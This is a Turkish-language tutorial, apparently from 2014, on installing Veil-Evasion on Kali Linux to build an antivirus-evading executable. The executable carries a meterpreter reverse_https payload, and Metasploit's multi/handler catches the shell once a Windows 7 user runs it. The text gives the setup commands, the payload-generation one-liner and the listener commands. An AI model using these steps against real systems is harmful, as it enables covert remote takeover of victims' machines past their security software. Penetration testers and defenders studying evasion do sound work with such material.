AV Bypass: Veil-Framework/Veil-Evasion

AV Bypass: Veil-Framework/Veil-Evasion

AV'lerden gizlenerek hedef sistemde çalışabilen bir exe hazırlamak için Veil adlı bir uygulama kullanılabilir. Bunun için Kali'ye Veil indirilir (yüklü değilse) ve yüklenir. Daha sonra da zararlı uygulama oluşturularak istemci makinede çalıştırılır.

Not: Diğer AV atlatma teknikleri için bakınız.

Not: Bu yazı 2014 Nisan ayında hazırlanmıştır. Bazı ekran görüntüleri son sürüm ile uygun olmayabilir.

Veil Aracının Yüklenmesi

Veil kodu https://github.com/Veil-Framework/Veil-Evasion adresinden indirilir.

Zip dosyasından çıkarılır.

cd Desktop
unzip Veil-Evasion-master.zip

Açılan klasörin içinde bulunan setup klasörü açılır ve içerisindeki setup.sh betiği çalıştırılır.

ls
cd Veil-Evasion-master/
ls
cd setup/
ls
./setup.sh 

Not: Bu betik yerine direk olarak Veil aracı başlatılarak da yükleme yapılabilir ancak bu tavsiye edilmemektedir.

Yükleme sırasında gelebilecek uyarılar kabul edilir.

Yükleme işlemi sırasında Python'un da yüklenmesi için bir ekran otomatik olarak çıkar:

Python yüklemesi tamamlanır:

Daha sonra da Pywin32 arazının yüklenmesi için başka bir pencere açılır:

Pywin32 yüklemesi tamamlanır.

Böylece Veil yüklemesi tamamlanmış olur.

Veil Uygulamasıyla Zararlı Uygulama Oluşturma

Yükleme işlemi tamamlandıktan sonra Veil-Evasion.py betiği çalıştırılır.

Tüm payload'lar listelenir.

Toplamda 28 Payload listelenir:

İstenilen payload seçilir:

Not: Payload seçiminde payload ID' değeri kullanlabildiği gibi, payload adı da kullanılabilir.

LHOST, LPORT gibi seçenekler ayarlanır: ve payload üretilir:

set LHOST 192.168.159.99
set LPORT 443
generate

Oluşturulacak uygulamaya isim verilir. Ayrıca uygulamanın ne şekilde oluşturulacağı belirlenir.

Sonuçta uygulama elde edilerek /root/veil-output/compiled dizinine kaydolur.

Not: Seçenekler belirlenirken tek bir satırda da işlem gerçekleştirilebilir. Ancak betik programlama haricinde bu işlemin yapılmaması, seçeneklerin manuel olarak ayarlanması daha uygundur. Aksi halde, yeni eklenen Payload'lar fark edilememiş olabilir. Örnek bir kod aşağıdaki gibidir (denenmedi):

./Veil.py -l python -p AESVirtualAlloc -o ZararliUygulama --msfpayload windows/meterpreter/reverse_https --msfoptions LHOST=192.168.159.99 LPORT=443

Zararlı Uygulamanın Çalıştırılması ve Bağlantının Elde Edilmesi

Zararlı uygulama Windows 7 bir makineye atılır.
Windows 7 kullanıcısı bu uygulamayı çalıştırdığında bağlantı KALI makineye düşecektir. Bu bağlantıyı dinlemek için MSF'teki exploit/multi/handler modülü kullanılabilir Windows 7 kullanıcısı bu uygulamayı çalıştırdığında bağlantı başlar ve meterpreter oturumunda (payload seçiminde meterpreter kabuğu oluşturulması istenmişti) istenilen kod çalıştırılır:

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf  exploit(handler) > set ExitOnSession false
msf  exploit(handler) > set LHOST 192.168.159.99
msf  exploit(handler) > set LPORT 443
msf  exploit(handler) > exploit -j